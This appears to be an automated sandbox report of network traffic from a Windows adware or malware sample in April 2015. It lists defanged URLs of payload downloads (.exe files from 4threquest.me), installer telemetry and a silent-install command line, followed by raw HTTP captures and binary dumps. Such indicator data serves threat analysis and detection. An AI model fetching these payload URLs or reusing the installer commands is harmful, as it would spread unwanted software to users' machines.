hxxp://4threquest.me/310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt | |
hxxp://4threquest.me/310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php | |
hxxp://dyno3mlj15jgv.cloudfront.net/V19/amipb.js | |
hxxp://plainsavingscenter.com/fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ== | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php | |
hxxp://plainsavingscenter.com/ii?alpha=… | |
hxxp://plainsavingscenter.com/if?alpha=… | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F | 184.173.191.224 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp | |
hxxp://brsoftwarellc.com/services/rules.txt?dummy=779 | |
hxxp://related.deals/services/stores?dummy=593 | |
hxxp://brsoftwarellc.com/services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268 | |
hxxp://related.deals/services/rules?dummy=865 | |
hxxp://download.dynect.mozilla.net/?product=firefox-34.0.5-complete&os=win&lang=en-US | |
hxxp://related.deals/services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677 | |
hxxp://a1284.g.akamai.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar | |
hxxp://www.google.com/ | |
hxxp://www.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg | 173.194.113.207 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok | |
hxxp://www.gosaferllc.com/services/rules.txt?dummy=908 | |
hxxp://www.gosaferllc.com/services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408 | |
hxxp://www.ninjasoftwarellc.com/services/rules.txt?dummy=328 | 167.114.34.238 |
hxxp://www.ninjasoftwarellc.com/services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744 | 167.114.34.238 |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish | |
hxxp://www.ejpkwz.cc/3517/2 | |
hxxp://www.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip | |
hxxp://rp.beyabir.com/?pcrc=216881437&v=2.0 | |
hxxp://rp.beyabir.com/?pcrc=1431802907&v=2.0 | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm | |
hxxp://brsoftwarellc.com/services/rules.txt?dummy=100 | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite | |
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync | |
hxxp://xa.xingcloud.com/v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist | |
hxxp://xa.xingcloud.com/v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm | |
hxxp://xa.xingcloud.com/v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm | |
hxxp://xa.xingcloud.com/v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install | |
hxxp://xa.xingcloud.com/v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253 | |
hxxp://www.theviilage.com/windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv= | 50.97.33.37 |
hxxp://www.theviilage.com/searchprotect/up?ptid=pcm&sid=IHProtectPlugin&ln=en_us&ver=4.0.1.2253&uid=535559167_198339_B48A115F&dp=0 | 50.97.33.37 |
hxxp://a1284.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756 | |
hxxp://a1363.dscg.akamai.net/pki/crl/products/WinPCA.crl | |
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl | |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146 | |
hxxp://a1363.dscg.akamai.net/pki/crl/products/microsoftrootcert.crl | |
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef | |
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= | 72.167.239.239 |
hxxp://ocsp.godaddy.com.akadns.net//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi | 72.167.239.239 |
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== | 72.167.239.239 |
hxxp://ocsp.godaddy.com.akadns.net//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs= | 72.167.239.239 |
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg== | 72.167.239.239 |
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== | 72.167.239.239 |
hxxp://a1284.g.akamai.net/msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962 | |
hxxp://crl.globalsign.net/root-r3.crl | |
hxxp://crl.globalsign.net/gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ== | |
hxxp://crl.globalsign.net/root.crl | |
hxxp://crl.globalsign.net/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA== | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= | |
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html
GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /010914s/010914i.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
GET /010914s/contabilizar.php?id=230313 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: EXPIRED
CC: UA
Content-Encoding: gzip
GET /ids/id230313/stats_confirma.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/contabilizar.php?id=230313
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: MISS
CC: UA
Content-Encoding: gzip
GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 01 May 2015 23:07:06 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
POST /thankyou.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1308
Host: VVV.amoninst.com
_srvlog=&browser=ie&c[MyBestOffersTodayBR][r]=0.01&c[MyBestOffersTodayBR][s]=-1&c[updater][r]=0&c[updater][s]=-1&capp=updater&cc=UA&cid=9664&clip=193.138.244.231&cmdl=amisetup2899__9664.exe /s /ver 1.1.2.41 /u http://VVV.amoninst.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR&cnt=3e5a8f2a30ab988ef7a611138130e98a&current_screen=Finish_Last_Screen&is=-31&netfs=-31&os=NT6.1SP1&sysid=915A4028688142931B5DDA64A4540CAD&sysid1=066389C9740F80692FC30C6511692204&te=1430435235&tid=&ts=1430435233&ver=1.1.2.41&vert=3&mhx=dd599d1761410d78de3549ee3ea8673841bec801&base=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
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:15 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:51 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120373, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:23:40 GMT
Expires: Sat, 02 May 2015 10:23:40 GMT
ETag: "befea096dacc08f0bc2d2ea14601c0a19709dbf1"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
GET /registro/310113f8.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Last-Modified: Wed, 11 Mar 2015 17:29:02 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
GET /registro/icone_cadeado.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /registro/carregando.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: image/gif
Content-Length: 4176
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 30 May 2015 23:07:42 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GET /img/Global/declineBG.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1527
Connection: keep-alive
x-amz-id-2: LsJpuXhB3IbHEy7ZHe7WV8uGeSQ9o9HFRMUuEjtSs00r6BYLEJZsLd1C2dR1aukm
x-amz-request-id: 93C41663D1D347D1
x-amz-meta-s3fox-filesize: 1527
x-amz-meta-s3fox-modifiedtime: 1385033566667
Last-Modified: Thu, 21 Nov 2013 11:43:23 GMT
x-amz-version-id: TJNGNP9J.pYgtH1WelxAjMHRSvYRyHyQ
ETag: "c3671f6a6b3932da75a4c6b57cd45614"
Accept-Ranges: bytes
GET /img/Global/No_Button.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1090
Connection: keep-alive
x-amz-id-2: 7WjnhU0tPyReiclfSk2lMFXKk a5jcICVQZv5/SuoOjs3rkF2ueCvAPmIZCZwiYU
x-amz-request-id: 7FCF11E31494066F
x-amz-meta-s3fox-filesize: 1090
x-amz-meta-s3fox-modifiedtime: 1380713503002
Last-Modified: Wed, 13 Nov 2013 16:12:45 GMT
x-amz-version-id: H1gWa5fQ5azVvHrSdifdTj_fe_Q1czxc
ETag: "4462e7ebdf4a24f57b288fbca0602dea"
Accept-Ranges: bytes
GET /img/Sihehihi/Sihehihi_31_03_15.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 7421
Connection: keep-alive
x-amz-id-2: tb3wzOqbdaXKpKNL10W0GD7quW/G8dQsROYO1ZNZx4BSp/ WOCV6IN Tr7fFpLso
x-amz-request-id: 1A430C7BD6E060DF
x-amz-version-id: fwDsegYHRL0JOsa1HMn_zrCAJNbvgq_T
x-amz-meta-cb-modifiedtime: Tue, 31 Mar 2015 09:00:45 GMT
Last-Modified: Tue, 31 Mar 2015 09:01:01 GMT
ETag: "99901d117a18376c2cf58e46fe682679"
Accept-Ranges: bytes
GET /img/Rerarapepe/logo_new.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 4569
Connection: keep-alive
x-amz-id-2: i8ICCXz5aRAGTe6TbJWncaksmnn7Nf o0zWa6P1Emvu b2naXV5VqYrZ44fl/JsT
x-amz-request-id: F053A26F739ABFD6
x-amz-meta-s3fox-filesize: 4569
x-amz-meta-s3fox-modifiedtime: 1388397217065
Last-Modified: Mon, 30 Dec 2013 09:53:59 GMT
x-amz-version-id: FBdIFQNqjG8fAIwxlMklzjPUXqz3Asib
ETag: "3263ff057b8e7380f7579d5aaab2bfdc"
Accept-Ranges: bytes
GET /img/Rerarapepe/Rerarapepe.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 3657
Connection: keep-alive
x-amz-id-2: Z0jI9oUtCmkwjhrm4fpr7I34XCbbJafI4wdwaCXRwxEFhVvEbJ9HB6a84y2LlhS6
x-amz-request-id: 6ABD9C086DAAC9E3
x-amz-meta-s3fox-filesize: 3657
x-amz-meta-s3fox-modifiedtime: 1402226184727
Last-Modified: Mon, 09 Jun 2014 14:19:41 GMT
x-amz-version-id: nXvqG1jeKyMVMqgSg3LnBI1CMsSqJwdV
ETag: "e568d92e622a3ac2f573a98d91df1421"
Accept-Ranges: bytes
.PNG........IHDR.......!.............tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D84B53BEEFE11E39491D45C0DAE79C8" xmpMM:DocumentID="xmp.did:2D84B53CEEFE11E39491D45C0DAE79C8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D84B539EEFE11E39491D45C0DAE79C8" stRef:documentID="xmp.did:2D84B53AEEFE11E39491D45C0DAE79C8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..(.....IDATx..Wi....~U.=....].7.5..l.@..1v...Vb..`..H8.\..D. Q.EA.....Q8..cB.c....&vv}a........3;..]..z...(%..LMu......^3..1"...mr.. ..b...z.B.\.<]!...8...J.~.R.^.U....ArE...q...QW......W.. M..l......R..Dd."...P......F..-.....S...S... .OF...I./.N.&e6.....TW.c....z......@.......`_.X'...X8.3op.'...z&.UT.m...r4:.1.'&.1F....9....Fr&..U...d......<..Z.Q.^.}]X.......D!......73.a.8.....Q..c.w...).^U#..L3..}m......:.z..NN...r.Y..Ck..E}..-....t1..?g..d..t.E:4x.*#....L...(wv..~.OY.......wfO.L.0....4...Ko........h. s6M\.D....$.....W......6g...............>x....<..[...F"5C..=K.....[v...O'..ky
<<< skipped >>>
GET /pki/crl/products/WinPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
Accept-Ranges: bytes
ETag: "dde36a309c58d01:0"
Server: Microsoft-IIS/8.0
VTag: 43879645100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 561
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
0..-0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1 0)..U..."Microsoft Windows Verification PCA..150306223202Z..150605105201Z._0]0...U.#..0.......p............<.J0... .....7.......0...U......40... .....7......150604224201Z0...*.H.............4......n[.t........'....Dx.P3R.!3.|D.6vL.."k..9'....L..k......e.4......._..N..TJ......N.fP...H.....8...TJA...fGA.e...^"{../...H?..E.Y.U....h..0/.......d...6..K..V?QM...{..h.....{.3...v.....\~.7n..5..'..k.Ia.YL..LP.b....._7.V..%......z*$q..Y..f.b..L8<~..v.w....
GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
Accept-Ranges: bytes
ETag: "cf2633d6957d01:0"
Server: Microsoft-IIS/8.0
VTag: 43853244400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 550
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:16 GMT
Connection: keep-alive
0.."0......0...*.H........0w1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1!0...U....Microsoft Time-Stamp PCA..150304221607Z..150603103607Z._0]0...U.#..0...#4..RFp..@.v.. ..5..0... .....7.......0...U......20... .....7......150602222607Z0...*.H.............Y..}y`....T.Z..`B<..I.N..O... E:....7......a..).........._|W5laoqi(..>t~.."...&`.._.7J...:..{bO_Kyi...R...!...B.s..I.c&j...(I\.S{._;@B...[i.e.[."...R` \...........M^k.=q[.V...9y..G.1o#k3<.W.......H.$>}...U...2qyd2|b.fB.....r....H.P...;....Q...b......5%.P.#..
GET /?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg HTTP/1.1
Host: VVV.google.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 302 Found
